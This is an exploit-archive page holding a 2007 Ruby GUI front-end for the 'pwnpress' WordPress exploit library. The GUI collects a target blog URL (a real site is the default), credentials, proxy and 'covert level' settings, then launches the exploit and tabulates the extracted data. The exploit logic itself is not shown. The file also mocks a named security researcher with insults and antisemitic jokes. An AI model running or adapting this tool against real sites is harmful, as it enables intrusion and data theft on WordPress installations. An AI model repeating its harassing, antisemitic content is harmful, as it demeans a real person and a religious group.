Home / exploitsPDF  

wordpress-toolkit-gui.txt

Posted on 14 September 2007

# Copyright (c) 2007 Lance M. Havok <lmh [at] info-pull.com>. All Rights Reserved. # Exploits R' Us: bringing the amazing world of exploitation toys to your mom. # Please read http://www.info-pull.com/code/DISCLAIMER for licensing terms. begin require 'pwnpress' require 'rubygems' require 'fox16' include Fox rescue puts "Need rubygems, fxruby and pwnpress!" exit end # gif streams free of evil, no infinite gif parsing advisories for you THE_EVIL_RABBI = "x47x49x46x38x39x61x30x00x30x00xd5x37x00x1d" + "x1dx1dx47x49x49xecxf2xf1x29x29x29x38x38x38" + "xe5xd2x52x3fx3fx3fx25x25x25xbdxcaxb8x6ex71" + "x71x64x56x15x35x4dxc8xaaxb8xa5xffxf2x9bx87" + "x8ax89x4cx42x00x45x49x44x92x9dx8ex43x43x43" + "x97xa1x93x8dx82x33x18x1cx17xadx9fx3ex28x28" + "x28x81x77x2ex94x98x97x00x00x00x7ex8bx9bx1f" + "x2dx76x90x9cx8cx69x6fx67x4bx4bx4bx90x9ax8c" + "x42x42x42x0cx1ax0bx67x6ex64x86x86x86xb1xbb" + "xaexbaxbaxbax5ax5ax5ax0dx0ex28x89x8dx8dx64" + "x6cx61xabxabxabx34x3ax32x88x75x1dx15x19x13" + "x92xa0xb2x21x33x1fx21x21x21x3ax42x4cx6fx77" + "x81x4cx58x51x31x31x31x09x0ax1cxffxffxffx00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x21xf9x04x01x00" + "x00x37x00x2cx00x00x00x00x30x00x30x00x00x06" + "xffxc0x9bx70x48x2cx1ax8fxc8xa4x72xc9x6cx3a" + "x9fxd0xa8x74x4axadx5axafxd8xacx76xcbxedx7a" + "xbfxe0x29x80x30x28x9bx07x21x40x98x38x3ex9f" + "x43x6bx61xdbxfdx8ex03xeexf8x3cxdex3bx20xf8" + "xffx80x81x82x04x5ax7ax86x87x7bx5dx01x1bx34" + "x14x14x16x8ex91x16x01x20x01x61x01x1dx33x16" + "x05x9cx9dx05x16x32x95x97x1dx18x9bx05x25xa7" + "x9cx0dx0fx1dx96x60x01x0cx18x10xb3x10x05xb4" + "x10xacxaex5fxb0x18x02x36x02x18x9fxbex02x0f" + "x0cxbax5exbcx05x0dx0dx18x0dxcaxcbxc5xc7x8a" + "x0cx1exa6x0fxd7x9dxd1x97xc6x1ex1ex08xdfxdf" + "x1bx1ex2axc6xdbx01x29x29x1axeaxeaxdfx2axa2" + "xafx11x01x23x08x2fxe0xe1x23xf1x6bx01x2ex01" + "x11x13x13xdfx22x6cx88x30x42x1ax97x5fx02x1c" + "x88x58x04x10x41x84x08x0ex3ex08x10x70xc1x8b" + "x8dx04x13x13x2exfcxe7x50x84x83x8cx24x2ax6e" + "xb1x51x83xc3x82x93x0ex1cxb0xf8x37x01x46x0c" + "x93x27x3fx84xdcx82xa2xe4xc9x05x12x32x08x38" + "x70x60xa2x0dxa9x98x0bx6ax7cxb0x41xb3x06xc6" + "x89x12x1cx64xe0x99xc1xc1xc5x8cx35x0cx10xd5" + "x42xf2xa8x80x1ax39x99x3ax90x60xf5x82xd4x91" + "x46x13x88xadx81xd5xc6x01x1bx12xc2x8axb5x71" + "x61x6ax16x92x52xcdx92x2dx9bx76xeex59xb6x6e" + "xb1xc0xb5x21x77x2exc9xb9x35xeex7axd5xa2xe0" + "x84x89x15x66x0fx00xfex6bxd7x86xe1x15x0axb2" + "x28x50xa5x80xafxe5xcbx98x5bx28x8bx2cx59x81" + "x67xb3x06x42x8bx1ex6dxc3xb3xe7x2fx7dx6bx58" + "x9exfbx75x4dx6axa2x8cx5bx87x79x7dx23x76x5e" + "xd4x8axc9xc2x66x7dxdbx4bx85xdcxaax6fx54xe0" + "x1dxe7xb7x5fxe1xc4x67x63xaex50x7bxb9xf2xcb" + "xccx31xf3x85x12x04x00x3b" THE_REAL_HERO = "x47x49x46x38x39x61x30x00x30x00xe6x41x00x06" + "x0bx22x28x00x00x1ax38xa6x27x51xf6x1ex3exbd" + "x1bx3axafxfax00x00x18x33x99x15x2dx88xf4x5f" + "x5fx26x38x7dx26x4fxf0x20x42xcaxc8xa0x8bxb5" + "x7fx62xc5xadx0fx0bx17x46xb4x0dx0dx30x04x04" + "xf3xd5x13xacx10x10xa9x94x0dx3ax26x1cxa2x6a" + "x4dxffxffxffx5ex08x08x45x66xe2xffx53x53x25" + "x03x03x44x06x06xddxb1x9ax02x04x0bx75x91xff" + "x1ex3exbex60x78xd3xd1x00x00xeax11x11xa5x0c" + "x0cx8axa0xf6x61x07x07x91xa5xeexdbxe1xf9xb0" + "x00x00x76x89xd3xe6x15x15xe5xd2xc8x24x4bxe6" + "x3cx5dxdbxc7x9fx89x75x4dx38xe5xd3xc8xc1x94" + "x7dxffxccxb2x85x57x3fxc8xa1x8bxc1x95x7dxc7" + "xa1x8cx23x4axe1xffx81x81x1cx3axb2xb4x80x63" + "x3dx42x66x6ax84xe8x08x12x36x22x47xd9xffxff" + "xffx00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x21xf9x04x01x00x00x41x00x2c" + "x00x00x00x00x30x00x30x00x00x07xffx80x41x82" + "x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" + "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx93" + "x00x3fxa1x3fx9ex8bxa1x22xa7x3ex29xa1xa4x87" + "x3fx22x3ex40x40x2ex2ex40xa9xa3xacx83x3fxb0" + "xb1xbcxbcxaaxb8x41xbax40x0axc4xbcxc4x0ax40" + "xb7xacx3fxc3x28x18x28xc8x0axcexd0x26xcax9d" + "x00xb0x0ax18x1fx18x3dxc4xdbx18x0ax3exd5xa4" + "xccxb1xc5x08x37x08xc3xc8x40x0bxd6x9axc2xbd" + "x08x17x33x32xebxbcx0bx20xf0x96x00xa0xbbxb1" + "x10x38xb8xe0xa1x85x07x7cxeex7cxacxbaxe4xcf" + "x87x42x80x02x07x62x68xd1x00x06xbex05x0axab" + "xf1x7bx84x0dx96x00x79x11x1dx58x18xd9xa0x81" + "x8dx75x18x99x99xc0xb0xd0x51x80x97x00x3fxc2" + "x42xd0xc0x41x8cx81x17x2ex34xa8xd1x00x07x82" + "x94x0ex7dx80x00xf1x32x00xa3x00x1bx36x18x00" + "x72xe0x40x01x20x32x81x08x1cx49x95x24x82x17" + "x3ex00xf4xaaxb5x41x07x06xa3x8bx02x18xd8xe0" + "x0fxc8x53xa8x1fx16x44xccx79x81x86xcex06x08" + "xffxb2xc6xc2x78x20x94x01x03x60x8fx1ax95x00" + "xe0xacx00x00x6ax79x38x70xd0xc0x83xe1x92x71" + "x3fxccx05x01x40xd0xcbx48x12x28x00xd0x50xe0" + "x29x36xb5x83x4bx96x3cxb8x00x88xe2x5ax0bx00" + "x74x98x14x19x80x53xcax50x01x88x88x15xd4x61" + "x2dxcfx02xe6xeax13x0dx99x82x01xd3x95x29x17" + "xf8x28xaaxb7xa8xd8x2bx58x87x36x30xdax51x64" + "x03x19x70xa3x06x02xa1x82xf3xe7xd0x2bx40x18" + "x30x60xc5x80x5axfbx88x1bx1fx91xfcx00x90xe5" + "xccx1fx4cx78xf0x80x82x79xf2xe3x21xe4xa0x6e" + "xbdxd6x0fxedx8cx8ex77x47x4dx80x00x83x10x10" + "xc4x4fx60x31xa1x7fx7axeax00x52xa7x10x7cx8b" + "x48x30x02x72xa6xd1x67xdfx7dxf9xedxc7x02x05" + "xe9xf5xb2x00x80x03x12x88x48x64x14x64x30xdf" + "x53xf5x31xc0x00x10xf8x95xd7xdfx03x10x6cx05" + "x04x85xefx49xd0x88x04x12x68x88xdbx0ex1ex7e" + "xc8x4bx88x11x9ax88xa2x8ax8fxb4x88x1bx10x0b" + "x6ex15x62x89x26xc6x22xe0x46x05xeexd8xa3x8f" + "x40x06x79xe2x91x00x0ax7dxe2x14x8fx32x2axa9" + "x24x8ax4ex72xe8xa1x94x41x52x47x00x93x44x32" + "xd2x57x6cxf6xd5x27xe6x98x64x8ex29x40x93x94" + "x98x06x95x00x6cxb6xe9xe6x9bx6fxc2xd2x65x23" + "x1cx94x40x42x02x78xe6xa9xe7x9ex7bx92xc0x01" + "x26x75x92x10xc1xa0x84x9ex30x68x09x86x12x4a" + "xa8x9fx9axd4x19xe4x09x1cx9cx10x24xa3x9bx98" + "x06x50x2cx8dx69xb5x55x56x9exa8xc9xcbx01x99" + "x7axc7x0bxa7xa4x20x75x97x0ax79x05xa0xc2x81" + "x1bxe4xd5x09x52x07xa2x5ax48x00x07x8exe5xea" + "x26x45x15x35x6bxaexb7x2ax12x08x00x3b" HERE_COMES_MRBEAR = "x47x49x46x38x39x61x1dx00x20x00xf7x00x00x6b" + "x29x5ax63x52x84x8cx29x4ax8cx39x4axadx42x4a" + "xa5x5ax5axbdx73x52xc6x6bx4axe7x42x52xffx7b" + "x4axf7xbdx31xefx9cx6bxf7x8cx6bxffxe7x7bxad" + "xb5xffxcexffxffxffxffxffxf7xbdx31x00x00x00" + ("x00" * 700) + "x00x00x00x00x00x00x00x00x00x00x00x21xf9x04" + "x01x00x00x11x00x2cx00x00x00x00x1dx00x20x00" + "x00x08xfex00x23x08x14x08xa0xe0xc0x83x08x13" + "x2ax8cx50xd0xe0xc0x86x00x16x2ex84x68x10x40" + "x01x03x18x0bx38x6cx28x91x62x41x03x0cx42x66" + "xd4x48x51xa1xc7x82x21x53x1ax20xe9xb1x23xc5" + "x94x0cx0cx9cx8cxe8x12xa2xcax99x0ex13x5ax64" + "xc0x12xa4xccx86x2bx0bx68xecx58x20xa4x83x07" + "x0ex3ex36x74x20x52xe8x50x85x45x19x1cx45x5a" + "x50xe3xd4x07x4dx9fx22x04x00x92xc1x03x08x0d" + "x85x36x84x00x01x2bx4fxb1x09xa3x3ax20x5bx35" + "x26x49xb2x10x98x06xa5xf9xb0xebx5axb0x5cx45" + "x16x84xcbxf4xacxd6x08x17x8dxc2x85x00xf3x2b" + "xdfxacx74x77xa6x9cxdax57x30xd9xc6x7ex69xe6" + "x85x49x59xa4x83xcbx94xe7x0ax0cx1cxa0xefxca" + "x93x81x61x06x1dxcax19x42x00x8dx02x52xabx4e" + "x6dx11xa4x83x00x6exd1xb6xeexfcx20x00x01x02" + "x08x72x23xb8xadx1ax40x00xd3x23x87x5ax14x1a" + "x20x80x00xdcxbax75xf3x0ex80x34xc0xe8xa7x55" + "xc5xe2xacx5axdcx29xdax08x02x12x24x40x20x00" + "xa2x50x8cxe0xadx6fx5bxdfx98x60xc1x82xedx00" + "x0ex98x5fx70x60x3axc7x87x00x04x20xd0x8ex00" + "xc0x82x06xf8xf3xe3x3fxc0x7fx00xddx83xf1xb1" + "x36x9fx7dxfaxe9xc7x5fx80x02x98xd4x5bx7dxea" + "x15xd8x00x7bxf1xe9x96xa0x4exf1x55x08xc0x00" + "xf7xe1x67x5ex7bxf2x69xa7xddx84x14xfexc7xdf" + "x01x03xf8x17xa1x76xe7x25x00xa2x44x1dx75xe8" + "x61x7dx2cxc6x78xe2x76xddxc5x28x23x82x35xda" + "x78x63x4ex01x01x00x3b" THE_POWER_HEAD = "x47x49x46x38x39x61x30x00x30x00xd5x32x00x00" + "x47x65x93xbax86x16x86x94x34x34x1ax48x1ax29" + "x08x5fx77x7dx80xb1x2fx2fx66xccxd3x7dx26x34" + "x38x46x45x68x58x73x62x34x47x4dx24xaexb1x4c" + "x4cx50xa5xa6xd5x01x37x7axc7xc6xccxabxaexb2" + "xf0x6dx5cxcdxccxd1x55x57x8bxfbxfbx20xf8xfb" + "xffx47x48x5bxa9xafx6ex77x7ax8cx2ex2dx5axb8" + "xb9xe7xd5xd3xd5xb5xb4xbex4cx4ex6bx6cx70x46" + "x9cx39x5ax6bx6bx86xa9x28x3ax8ax89x9dxacx99" + "x53x1fx7exc7x00x00x32x4fx4bx64xddxe0xebxff" + "x74x76x7bx9cx70xffx48x48xacxacx1ex42x59x56" + "x97x95xafxf2xefxecxafxb1xdexffxffxffx00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" + "x00x00x00x00x00x00x00x00x00x21xf9x04x01x00" + "x00x32x00x2cx00x00x00x00x30x00x30x00x00x06" + "xffx40x99x70x48x2cx1ax8fxc8xa4x72xc9x6cx3a" + "x9fxd0xa8x74x4axadx5axafxd8xacx76xcbx15x36" + "xbax51x40xe1x0bx6ex8ax05x0dx72x39x29x2ex14" + "xd0xeax2dx60x7ex1cx38xeexf8xbbx71x4ex0fx0b" + "xfex7dx42x03x1ex30x85x86x30x1ex0ex43x73x69" + "x69x00x52x67x68x74x83x87x95x89x32x00x7fx7f" + "x0dx8fx53x91x8ex03x11x1ex14xa4x95x30x0ex73" + "x6fx68x05x55x6dx9bx0dx02x11xa6x87xa8x9ax02" + "x05x9dx54xaex9ax11x24xa4x14x12xbexa5xb7x9a" + "xb8x57x6dx6ex6fx11x1ax29x17x17x12xccxcex30" + "xb6x02xb9x56xc8x28x00xcbx12x27xcfx1axdcx17" + "xd3x28x80x72x6ex03xdaxdfx12xdex12xeax85x03" + "xd5x5dx62xa1xbdx1fx1fx23x2cx2axf5x1fx85x6e" + "xd6x59xf2x03x32x44x88x90x61x84xc1x0cx86x06" + "x18x03x33x27x60x06x04x10x23x22x78x78xcex1f" + "x97x80x08x06x68xdcx38x00xe2x80x35x43x06x80" + "x90x48x12xc4x47x90x32x0ex1cx18x49x12x01x88" + "x03x27xc1xa8x3cx50xa1x26x86x9bx38x31x0cxa8" + "x30xf3x00x97xf0x03x06x1exc4x88x51xc1x00x04" + "x13x47x93x1axa8x10x83x83x53x9fx5ax0ex3cx98" + "x3axb4x02x84xabx58x21x30x1dxdax14x2ax16xa0" + "x42x83x72x8dx61xa0xecxd8x18x2fx86x72xf0x6a" + "x05xe8xd0xb2x42xcfx8ex35xb0xc1xc0x50xb6x55" + "x7ax02x15x2bx97x2cxddx0dx80xf1x52x19x50xc2" + "xc2x80xbdx71xfbx96x1dx60xc1x70x16xc2x86x11" + "xf7x7dx6bx80xb1x63x2cx90x0fxc3x9dxecx77x40" + "x8bxcbx57x14x88x18xadx80x81xe9xd3xa8x4fx1f" + "x50xc0x5ax41x16x05x1dx0ax29x48xb0x20x80xed" + "xdbxb8x13xc0x8exedx1ax0bx6cx18x22x66xd7xc6" + "x4dx5cxf7xefxdexa1x5bxcbxa0xedx62x81xf3xe7" + "xcex03x24x90xd1x1axf9x16xdax0bx52x9bx5ex21" + "x1dxe5xf2xe1x2bxa6xd3xbex3dx1dxe5x78xdbxe2" + "x87x77x37xafx3ex3dx79xefxe7xbbxc7x2fx5fx86" + "x80xfdxfbx04xa6xe3xc7x0fx86x40x88x10x2ax4c" + "x20xe0x04x04xc8x40xc0x80x02xfex57x20x17xfb" + "xf1xd7xe0x7dx4ex04x01x00x3b" # Amazing Fortune Lunches EVRONIAN_QUOTES = [ "Buy me two lunches, INFOWAR INFOWAR! GRONF! ARABSAT HAXHAHAXHAXHAX YAHWEH!", "It's the perfect crime, both low-risk and high-profit.", "The war to make the Internet safe was lost long ago, and we need to figure out what to do now.", "It is obvious how the bad guys abuse this, and infect millions of computers just because their owners surf the net.", "Anyone up to doing some monkey fuzzing on that interface?", "Some training or awareness information on this subject distributed to your organizations could be very useful.", "Default passwords, especially in widely distributed devices, are bad.", "Buzzwords for FUD are generally a bad idea. Botnets are not terrorism. :P", # This one is 'real^2' fucking hilarious. cyber war, dude. fear, etc. "These cyber terrorism forums have a real connection to real terrorism.", "This connection between the real and virtual worlds when it comes to terrorism, is important.", # The egomaniac-lunatic-o-dramatic series "First, why do I think I'm expert enough on this subject to comment?", "I've had the honour to serve in an Information Security capacity with the Israeli Military Intelligence corps.", "I've had the pleasure of being the chief defender (CISO) of the Israeli Government's Internet Security Operation.", "I've the incredible reality of establishing and running the Israeli Government CERT.", "I've had the unquestionable fun of coordinating security efforts of Israeli ISP's with joint incident response.", "Over a decade of experience in Information Security, while currently employed at Beyond Security.", # FUCK YEAH, MASS DESTRUCTION SOUNDS SO FUCKING COOL! "To our knowledge we have never been hacked.", "Real Information Warfare is considered a Non-conventional Weapon, much like with Weapons of Mass Destruction.", "Most botnet C&Cs are a compartmentalized group out of the whole, ... Much like a terrorism cell.", # He needs some real sex urgently, with humans if possible. "Wife or whore?", # how about asking yours? hehe, just kidding "cho cho cho cho all aboard the JewBus! boxing match!" ] # update this array when new pwnpress.rb versions come out SUPPORTED_VERSIONS = [ "auto", "2.2.2", "2.2", "2.1.3", "2.0.5", "1.5.1.3", "1.5.1.1" ] class String def stripfmt self.gsub!(/ /, '') self.gsub!(/ /, '') self.gsub!(/ +/sm, " ") return self end end class PwnFoxGui attr_reader :sound_pid def initialize(width = 660, height = 500) @pwnApp = FXApp.new() @mainWin = FXMainWindow.new(@pwnApp, "ALERT TERRORIST ALERT PWNPRESS ALERT INFOWAR ALERT", :opts => DECOR_ALL|LAYOUT_FIX_WIDTH|LAYOUT_FIX_HEIGHT, :width => width, :height => height) @control = {} @options = {} @options[:version] = FXDataTarget.new("auto") @options[:proxy_host] = FXDataTarget.new("localhost") @options[:proxy_port] = FXDataTarget.new(8118) @options[:target] = FXDataTarget.new("http://blogs.securiteam.com/") @options[:username] = FXDataTarget.new("") @options[:password] = FXDataTarget.new("") @options[:covert_level] = 0 @options[:table_prefix] = nil @options[:fingerprint] = true @sound_pid = nil self.draw_controls end def activate @pwnApp.create @mainWin.show(PLACEMENT_SCREEN) play_soundtrack @pwnApp.run end def draw_controls rframe = FXVerticalFrame.new(@mainWin, LAYOUT_SIDE_RIGHT|LAYOUT_FILL_Y|PACK_UNIFORM_WIDTH) FXVerticalSeparator.new(@mainWin, LAYOUT_SIDE_RIGHT|LAYOUT_FILL_Y|SEPARATOR_GROOVE) lframe = FXHorizontalFrame.new(@mainWin, LAYOUT_SIDE_LEFT| FRAME_NONE|LAYOUT_FILL_X| LAYOUT_FILL_Y|PACK_UNIFORM_WIDTH, :padding => 10) # right frame controls... boombutton = FXButton.new(rframe, "PWN IT!") boombutton.connect(SEL_COMMAND, method(:launchPwn)) boombutton.icon = FXGIFIcon.new(@pwnApp, THE_POWER_HEAD) quit = FXButton.new(rframe, "POOOO!", nil, @pwnApp, FXApp::ID_QUIT) quit.icon = FXGIFIcon.new(@pwnApp, HERE_COMES_MRBEAR) infowar = FXButton.new(rframe, "INFOWAR!", nil, @pwnApp) infowar.icon = FXGIFIcon.new(@pwnApp, THE_EVIL_RABBI) infowar.connect(SEL_COMMAND) do |sender, selector, data| ret = evroni_fortune() while ret != MBOX_CLICKED_NO ret = evroni_fortune() end FXMessageBox.error(@pwnApp, MBOX_OK, "Gadi Evron is not amused", "INFOWAR ON YOU! YOU EVIL HACKER! I AM AN HERO!") end covert_level = FXDataTarget.new(2) covert_level.connect(SEL_COMMAND) do case covert_level.value when 0 @options[:covert_level] = 2 when 1 @options[:covert_level] = 1 when 2 @options[:covert_level] = 0 end end covertopt = FXGroupBox.new(rframe, "Covert level", GROUPBOX_TITLE_CENTER|FRAME_RIDGE) FXRadioButton.new(covertopt, "Low", covert_level, FXDataTarget::ID_OPTION+2) FXRadioButton.new(covertopt, "Medium", covert_level, FXDataTarget::ID_OPTION+1) FXRadioButton.new(covertopt, "High", covert_level, FXDataTarget::ID_OPTION) enableFinger = FXCheckButton.new(covertopt, "Enable fingerprinting") enableFinger.connect(SEL_COMMAND) do |sender, sel, checked| if checked or @options[:version].value == "auto" @options[:fingerprint] = true else @options[:fingerprint] = false end end copy = FXLabel.new(rframe, "Copyright (c) 2007 Lance M. Havok. " + "<lmh [at] info-pull.com> All Rights Reserved. " + "Icons from pixeljoint.com Exploits 'R Us: " + "Toys even your mom can use.", nil) copy.font = FXFont.new(@pwnApp, "System", 8) # Now the left frame(s) flayout = FXMatrix.new(lframe, 2, MATRIX_BY_ROWS|LAYOUT_FILL_X|LAYOUT_FILL_Y, :padding => 0) targetopt = FXGroupBox.new(flayout, "Target settings", GROUPBOX_TITLE_CENTER|FRAME_RIDGE) urimatrix = FXMatrix.new(targetopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X) FXHorizontalSeparator.new(targetopt, SEPARATOR_GROOVE|LAYOUT_FILL_X) secmatrix = FXMatrix.new(targetopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X) moreopt = FXGroupBox.new(secmatrix, "Optional", GROUPBOX_TITLE_CENTER|FRAME_RIDGE) proxyopt = FXGroupBox.new(secmatrix, "Proxy settings", GROUPBOX_TITLE_CENTER|FRAME_RIDGE) optmatrix = FXMatrix.new(moreopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X) proxymatrix = FXMatrix.new(proxyopt, 2, MATRIX_BY_COLUMNS|LAYOUT_FILL_X) # Required settings FXLabel.new(urimatrix, "URI (with WP path):", nil) FXTextField.new(urimatrix, 36, @options[:target], FXDataTarget::ID_VALUE, FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW) FXLabel.new(urimatrix, "Target version:", nil) versionbox = FXListBox.new(urimatrix, @options[:version], FXDataTarget::ID_VALUE, LAYOUT_FILL_X|LAYOUT_FILL_Y|FRAME_SUNKEN|FRAME_THICK, 0, 0, 200, 0) SUPPORTED_VERSIONS.each do |v| i = versionbox.appendItem(v) end versionbox.connect(SEL_COMMAND) do |sender, sel, clicked| @options[:version].value = versionbox.getItemText(clicked) end # Optional settings FXLabel.new(optmatrix, "Username:", nil) FXTextField.new(optmatrix, 12, @options[:username], FXDataTarget::ID_VALUE, FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW) FXLabel.new(optmatrix, "Password:", nil) FXTextField.new(optmatrix, 12, @options[:password], FXDataTarget::ID_VALUE, FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW|TEXTFIELD_PASSWD) FXLabel.new(proxymatrix, "Hostname:", nil) FXTextField.new(proxymatrix, 14, @options[:proxy_host], FXDataTarget::ID_VALUE, FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW) FXLabel.new(proxymatrix, "Port:", nil) FXTextField.new(proxymatrix, 5, @options[:proxy_port], FXDataTarget::ID_VALUE, FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW) # Now the results widgets results = FXGroupBox.new(flayout, "Results", LAYOUT_FILL_X|LAYOUT_FILL_Y|GROUPBOX_TITLE_CENTER|FRAME_RIDGE) @result_table = FXTable.new(results, :opts => TABLE_COL_SIZABLE|TABLE_ROW_SIZABLE|LAYOUT_FILL_X|LAYOUT_FILL_Y, :padding => 2) @result_table.visibleRows = 11 @result_table.visibleColumns = 3 end def evroni_fortune() title = "WARNING: Original Evronian Fortune - Gadi Evron says..." micon = FXGIFIcon.new(@pwnApp, THE_REAL_HERO) evroni_quote = EVRONIAN_QUOTES[rand(EVRONIAN_QUOTES.size)] ret = FXMessageBox.new(@pwnApp, title, evroni_quote, micon, MBOX_YES_NO).execute return ret end # Serialize the options and launch the Pwnpress instance def launchPwn(s, p, c) real_options = {} real_options[:version] = @options[:version].value real_options[:fingerprint] = @options[:fingerprint] real_options[:table_prefix] = @options[:table_prefix] real_options[:covert_level] = @options[:covert_level] if @options[:proxy_port].value != 0 and @options[:proxy_host] != "" real_options[:proxy_host] = @options[:proxy_host].value real_options[:proxy_port] = @options[:proxy_port].value else real_options[:proxy_host] = nil real_options[:proxy_port] = nil end if @options[:username].value != "" and @options[:password].value != "" real_options[:username] = @options[:username].value real_options[:password] = @options[:password].value else real_options[:username] = nil real_options[:password] = nil end real_options[:target] = @options[:target].value begin pwnInstance = Pwnpress.new(real_options) pwnInstance.exploit if pwnInstance.results refreshResultTable(pwnInstance.results) else FXMessageBox.new(@pwnApp, "Hmm, no results after exploitation", "Something didn't work or target is not vulnerable :(", FXGIFIcon.new(@pwnApp, THE_REAL_HERO), MBOX_OK).execute end rescue => e FXMessageBox.new(@pwnApp, "Ooops: danger rabbi robinson!", e.message, FXGIFIcon.new(@pwnApp, THE_REAL_HERO), MBOX_OK).execute puts "............. EXCEPTION" puts e.message puts e.backtrace puts "......................." end end # Refresh the FXTable containing the results after exploitation. def refreshResultTable(results) # calculate total size of results hash rows_size = 0 cols_size = 4 # id + data type + name + data cols_headers = [ "TYPE", "NAME", "KEY", "VALUE" ] results.each do |r| r[1][:data].each do |n| n[1].each do |i| rows_size += 1 end end end @result_table.setTableSize(rows_size, cols_size) row_num = 0 results.each do |r| row_id = r[0].to_s row_type = r[1][:data_type].to_s # output to FXTable widget, yummy (a textbox was too simple :( ) r[1][:data].each do |n| n[1].each do |i| row_name = i[0].to_s.stripfmt row_value = i[1].to_s.stripfmt row_key = n[0].to_s cell_type = cols_headers.index("TYPE") cell_name = cols_headers.index("NAME") cell_key = cols_headers.index("KEY") cell_value = cols_headers.index("VALUE") @result_table.setItemText(row_num, cell_type, row_type) @result_table.setItemText(row_num, cell_name, row_name) @result_table.setItemText(row_num, cell_key, row_key) @result_table.setItemText(row_num, cell_value,row_value) @result_table.setRowText(row_num, row_id) if row_num != rows_size-1 row_num += 1 end end end end cols_headers.each do |h| @result_table.setColumnText(cols_headers.index(h), h) end @result_table.setCellColor(0, 0, FXRGB(255, 255, 255)) @result_table.setCellColor(0, 1, FXRGB(255, 240, 240)) end # every decently funny exploit should feature a good soundtrack: # THE FINAL COUNTDOWN by Europe (thanks to j. h. christ for the suggestion) def play_soundtrack unless RUBY_PLATFORM =~ /linux/ FXMessageBox.warning(@pwnApp, MBOX_OK, "Music not available :(", "Only Lunix is supported for pwnage soundtrack, sorry.") return end unless File.exist?("europe-the_final_countdown.mp3") FXMessageBox.warning(@pwnApp, MBOX_OK, "Music not available :(", "Please put The Final Countdown (by Europe) as: "+ " europe-the_final_countdown.mp3 - in the same " + "directory of pwnpress-gui, enjoy. You will " + "need some mp3 supported player too.") return end play_path = `which mpg123`.chomp unless File.exist?(play_path) play_path = `which mplayer`.chomp end unless File.exist?(play_path) FXMessageBox.warning(@pwnApp, MBOX_OK, "No supported mp3 player", "Please install either mpg123 or mplayer in PATH.") return end # It's THE FINAL COUNTDOWN! BLOGGERS FALLIN THEY R HATIN ME FLOATIN... @sound_pid = fork do exec "#{play_path} europe-the_final_countdown.mp3" end end end pwnGUI = PwnFoxGui.new() pwnGUI.activate if pwnGUI.sound_pid exec "kill -9 #{pwnGUI.sound_pid}" end

 

TOP